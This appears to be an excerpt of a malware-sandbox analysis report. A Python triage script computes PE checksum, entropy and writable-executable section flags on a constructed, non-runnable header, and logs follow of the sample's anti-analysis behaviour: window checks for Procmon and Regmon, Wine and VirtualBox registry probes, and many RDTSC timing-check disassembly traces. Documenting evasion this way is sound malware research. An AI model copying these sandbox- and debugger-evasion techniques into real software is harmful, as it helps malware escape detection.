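    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    return e_lfanew + 88


def pe_checksum(data: bytes) -> int:
    """Recompute the header checksum as CheckSumMappedFile does: sum all dwords except
    the CheckSum field, fold carries back in, fold to 16 bits, add the file length.
    Packers that rewrite the file rarely fix this, hence the report's mismatch."""
    skip = checksum_offset(data) // 4
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for i in range(len(padded) // 4):
        if i == skip:
            continue
        total += struct.unpack_from("<I", padded, i * 4)[0]
        if total >> 32:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total = (total + (total >> 16)) & 0xFFFF
    return total + len(data)


def stored_checksum(data: bytes) -> int:
    return struct.unpack_from("<I", data, checksum_offset(data))[0]


def shannon_entropy(buf: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for uniform; packed or encrypted code sits near 8."""
    n = len(buf)
    if n == 0:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def zlib_complexity(buf: bytes) -> float:
    """Compressed size over raw size, the ratio the report calls ZLIB complexity; ~1.0 means incompressible."""
    return len(zlib.compress(buf, 9)) / len(buf) if buf else 0.0


def sections(data: bytes):
    """Yield (name, raw bytes, characteristics) for each IMAGE_SECTION_HEADER."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    n_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size
    for i in range(n_sections):
        entry = table + 40 * i
        name = data[entry:entry + 8].rstrip(b"\0").decode("latin-1")
        raw_size, raw_ptr = struct.unpack_from("<II", data, entry + 16)
        characteristics = struct.unpack_from("<I", data, entry + 36)[0]
        yield name, data[raw_ptr:raw_ptr + raw_size], characteristics


def triage(data: bytes) -> dict:
    stored, computed = stored_checksum(data), pe_checksum(data)
    report = {"stored_checksum": stored, "computed_checksum": computed,
              "checksum_ok": stored == computed, "sections": []}
    for name, raw, chars in sections(data):
        ent = shannon_entropy(raw)
        report["sections"].append({
            "name": name or "(empty)",
            "entropy": round(ent, 3),
            "zlib_complexity": round(zlib_complexity(raw), 3),
            "packed_looking": ent > 7.0,                      # threshold is this example's choice
            "writable_and_executable": bool(chars & IMAGE_SCN_MEM_WRITE) and bool(chars & IMAGE_SCN_MEM_EXECUTE),
        })
    return report


def build_sample_pe(checksum_field: int) -> bytes:
    """Constructed stand-in for the sample (not a runnable executable): a minimal PE32
    header with one W+X section named fvvfrivq whose body is every byte value once."""
    hdr = bytearray(0x200)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)                  # e_lfanew
    hdr[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<HH", hdr, 0x44, 0x14C, 1)             # Machine i386, NumberOfSections
    struct.pack_into("<H", hdr, 0x54, 0xE0)                  # SizeOfOptionalHeader (PE32)
    struct.pack_into("<H", hdr, 0x58, 0x10B)                 # optional header Magic
    struct.pack_into("<I", hdr, 0x98, checksum_field)        # CheckSum (0x58 + 64)
    sec = 0x58 + 0xE0                                        # first section header
    hdr[sec:sec + 8] = b"fvvfrivq"
    struct.pack_into("<IIII", hdr, sec + 8, 0x1000, 0x1000, 0x100, 0x200)  # VirtualSize, VA, SizeOfRawData, PointerToRawData
    struct.pack_into("<I", hdr, sec + 36, 0xE0000020)        # CODE | EXECUTE | READ | WRITE
    return bytes(hdr) + bytes(range(256))


if __name__ == "__main__":
    print(triage(build_sample_pe(0x200375)))   # stored value taken from the report, so it will not match
```

A checksum mismatch on its own is weak evidence (many legitimate linkers leave the field at zero), but combined with a near-8.0 entropy section that is also writable and executable, and an entry point outside the usual code section, it is the same picture the report paints for this sample.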

                Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess (graph_0-37938)
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address: FFD837, second address: FFD840, instructions:
    0x00000000 rdtsc
    0x00000002 pop edx
    0x00000003 pop eax
    0x00000004 pop eax
    0x00000005 push eax
    0x00000006 push edx
    0x00000007 push eax
    0x00000008 push edx
    0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address: FFD840, second address: FFD844, instructions:
    0x00000000 rdtsc
    0x00000002 pop edx
    0x00000003 pop eax
    0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address: FF1A0A, second address: FF1A10, instructions:
    0x00000000 rdtsc
    0x00000002 push eax
    0x00000003 push edx
    0x00000004 pushad
    0x00000005 popad
    0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address: FF1A10, second address: FF1A14, instructions:
    0x00000000 rdtsc
    0x00000002 push eax
    0x00000003 push edx
    0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address: FF1A14, second address: FF1A31, instructions:
    0x00000000 rdtsc
    0x00000002 pop edx
    0x00000003 pop eax
    0x00000004 pop edx
    0x00000005 pop eax
    0x00000006 pop edx
    0x00000007 pop eax
    0x00000008 pushad
    0x00000009 jmp 00007FB474E5AC21h
    0x0000000e push esi
    0x0000000f push eax
    0x00000010 push edx
    0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address: FFC855, second address: FFC87A, instructions:
    0x00000000 rdtsc
    0x00000002 jbe 00007FB474DDA566h
    0x00000008 jp 00007FB474DDA566h
    0x0000000e pop edx
    0x0000000f pop eax
    0x00000010 jmp 00007FB474DDA56Ah
    0x00000015 push esi
    0x00000016 push eax
    0x00000017 pop eax
    0x00000018 pop esi
    0x00000019 pushad
    0x0000001a pushad
    0x0000001b popad
    0x0000001c push edi
    0x0000001d pop edi
    0x0000001e push eax
    0x0000001f push edx
    0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address: FFCCBB, second address: FFCCC1, instructions:
    0x00000000 rdtsc
    0x00000002 pop edx
    0x00000003 pop eax
    0x00000004 push eax
    0x00000005 push edx
    0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: first address: FFD134, second address: FFD15B, instructions:
    0x00000000 rdtsc
    0x00000002 pushad
    0x00000003 push ecx
    0x00000004 pop ecx
    0x00000005 jmp 00007FB474DDA578h
    0x0000000a jo 00007FB474DDA566h
    0x00000010 popad
    0x00000011 pushad
    0x00000012 push eax
    0x00000013 push edx
    0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFF95F second address: FFF964 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFF9C6 second address: FFF9CB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFFB90 second address: FFFB95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFFB95 second address: FFFBD8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 4A0E374Dh 0x0000000f and dh, FFFFFFA3h 0x00000012 push 00000003h 0x00000014 push 00000000h 0x00000016 xor dword ptr [ebp+122D215Dh], ebx 0x0000001c mov dword ptr [ebp+122D21AEh], ecx 0x00000022 push 00000003h 0x00000024 sub dword ptr [ebp+122D17B7h], edx 0x0000002a add dword ptr [ebp+122D22C4h], eax 0x00000030 call 00007FB474DDA569h 0x00000035 push eax 0x00000036 push edx 0x00000037 ja 00007FB474DDA568h 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFFBD8 second address: FFFC1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB474E5AC27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jns 00007FB474E5AC2Dh 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFFC1A second address: FFFC82 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB474DDA566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e jne 00007FB474DDA56Ch 0x00000014 push ebx 0x00000015 jl 00007FB474DDA566h 0x0000001b pop ebx 0x0000001c popad 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 pushad 0x00000022 push esi 0x00000023 jns 00007FB474DDA566h 0x00000029 pop esi 0x0000002a jg 00007FB474DDA572h 0x00000030 popad 0x00000031 pop eax 0x00000032 jc 00007FB474DDA56Ch 0x00000038 lea ebx, dword ptr [ebp+124458C0h] 0x0000003e ja 00007FB474DDA56Ch 0x00000044 mov edi, dword ptr [ebp+122D36F9h] 0x0000004a xchg eax, ebx 0x0000004b push esi 0x0000004c push eax 0x0000004d push edx 0x0000004e push edi 0x0000004f pop edi 0x00000050 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFFCF4 second address: FFFCFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFFCFA second address: FFFD14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB474DDA576h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFFD14 second address: FFFD6A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jnp 00007FB474E5AC22h 0x0000000f jmp 00007FB474E5AC1Ch 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007FB474E5AC18h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 00000019h 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 adc edi, 0A760FCFh 0x00000037 push 624CF9FDh 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f jc 00007FB474E5AC16h 0x00000045 push ebx 0x00000046 pop ebx 0x00000047 popad 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFFD6A second address: FFFE01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB474DDA571h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 624CF97Dh 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007FB474DDA568h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 0000001Ch 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a mov esi, 40E4ABE6h 0x0000002f mov ch, dh 0x00000031 push 00000003h 0x00000033 mov dword ptr [ebp+122D27E9h], edx 0x00000039 sub dword ptr [ebp+122D2911h], ecx 0x0000003f push 00000000h 0x00000041 sbb di, D5C8h 0x00000046 push 00000003h 0x00000048 push 00000000h 0x0000004a push ecx 0x0000004b call 00007FB474DDA568h 0x00000050 pop ecx 0x00000051 mov dword ptr [esp+04h], ecx 0x00000055 add dword ptr [esp+04h], 00000017h 0x0000005d inc ecx 0x0000005e push ecx 0x0000005f ret 0x00000060 pop ecx 0x00000061 ret 0x00000062 sub dword ptr [ebp+122D35BFh], esi 0x00000068 call 00007FB474DDA569h 0x0000006d push eax 0x0000006e push edx 0x0000006f pushad 0x00000070 jp 00007FB474DDA566h 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFFE01 second address: FFFE06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFFE06 second address: FFFE64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB474DDA575h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FB474DDA572h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push edx 0x00000014 jl 00007FB474DDA579h 0x0000001a jmp 00007FB474DDA573h 0x0000001f pop edx 0x00000020 mov eax, dword ptr [eax] 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FB474DDA56Fh 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFFE64 second address: FFFEE2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB474E5AC18h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jmp 00007FB474E5AC1Bh 0x00000015 pop eax 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007FB474E5AC18h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 0000001Ch 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 sbb esi, 5CD871CDh 0x00000036 mov cx, 6E2Bh 0x0000003a lea ebx, dword ptr [ebp+124458CBh] 0x00000040 call 00007FB474E5AC1Fh 0x00000045 mov di, bx 0x00000048 pop ecx 0x00000049 xchg eax, ebx 0x0000004a jp 00007FB474E5AC24h 0x00000050 pushad 0x00000051 pushad 0x00000052 popad 0x00000053 jmp 00007FB474E5AC1Ah 0x00000058 popad 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFFEE2 second address: FFFEE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFFEE8 second address: FFFEED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1021093 second address: 10210E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB474DDA56Fh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push ebx 0x0000000d jmp 00007FB474DDA574h 0x00000012 pop ebx 0x00000013 popad 0x00000014 pushad 0x00000015 jmp 00007FB474DDA572h 0x0000001a jmp 00007FB474DDA56Eh 0x0000001f jo 00007FB474DDA572h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10210E9 second address: 10210EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101EF4E second address: 101EF59 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jg 00007FB474DDA566h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101EF59 second address: 101EF8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FB474E5AC1Ch 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push ecx 0x00000013 jmp 00007FB474E5AC28h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101EF8F second address: 101EF93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101F0DF second address: 101F0EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101F0EA second address: 101F10F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FB474DDA578h 0x0000000c pushad 0x0000000d popad 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101F3DD second address: 101F3E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101F528 second address: 101F561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB474DDA576h 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB474DDA577h 0x00000010 jo 00007FB474DDA566h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101F6CA second address: 101F6CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101FC2C second address: 101FC33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101FC33 second address: 101FC42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB474E5AC1Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1020020 second address: 1020026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1020026 second address: 102004A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB474E5AC25h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007FB474E5AC16h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102004A second address: 102004E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102004E second address: 102006C instructions: 0x00000000 rdtsc 0x00000002 je 00007FB474E5AC16h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop eax 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 pushad 0x00000014 popad 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 js 00007FB474E5AC16h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102006C second address: 10200B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB474DDA573h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FB474DDA570h 0x0000000f jmp 00007FB474DDA574h 0x00000014 jng 00007FB474DDA566h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF8532 second address: FF854C instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB474E5AC16h 0x00000008 js 00007FB474E5AC16h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 jnp 00007FB474E5AC16h 0x00000019 pop ebx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10207F6 second address: 10207FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10207FA second address: 102080A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102080A second address: 1020810 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1020810 second address: 1020814 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102098D second address: 10209B1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB474DDA57Bh 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1020C34 second address: 1020C61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB474E5AC29h 0x0000000a popad 0x0000000b push ebx 0x0000000c jng 00007FB474E5AC1Ah 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF6A1C second address: FF6A22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF6A22 second address: FF6A28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102B43F second address: 102B443 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102B443 second address: 102B478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB474E5AC23h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007FB474E5AC18h 0x00000011 pushad 0x00000012 jp 00007FB474E5AC16h 0x00000018 jnl 00007FB474E5AC16h 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102B76E second address: 102B774 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102BBB6 second address: 102BBC5 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB474E5AC16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102BBC5 second address: 102BBCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102BBCE second address: 102BBD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102BBD2 second address: 102BBD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102BE88 second address: 102BE98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB474E5AC1Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102BE98 second address: 102BEB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 jnl 00007FB474DDA584h 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jns 00007FB474DDA566h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102DC0F second address: 102DC2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB474E5AC1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jg 00007FB474E5AC20h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102DCD7 second address: 102DCDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102DCDD second address: 102DCE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102DCE1 second address: 102DD2D instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB474DDA566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 7F97B806h 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007FB474DDA568h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 00000019h 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d push ebx 0x0000002e or esi, dword ptr [ebp+122D37A9h] 0x00000034 pop esi 0x00000035 push 8D93DBFEh 0x0000003a jg 00007FB474DDA570h 0x00000040 pushad 0x00000041 push edi 0x00000042 pop edi 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102E801 second address: 102E805 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102E805 second address: 102E80B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102E80B second address: 102E844 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB474E5AC29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007FB474E5AC25h 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
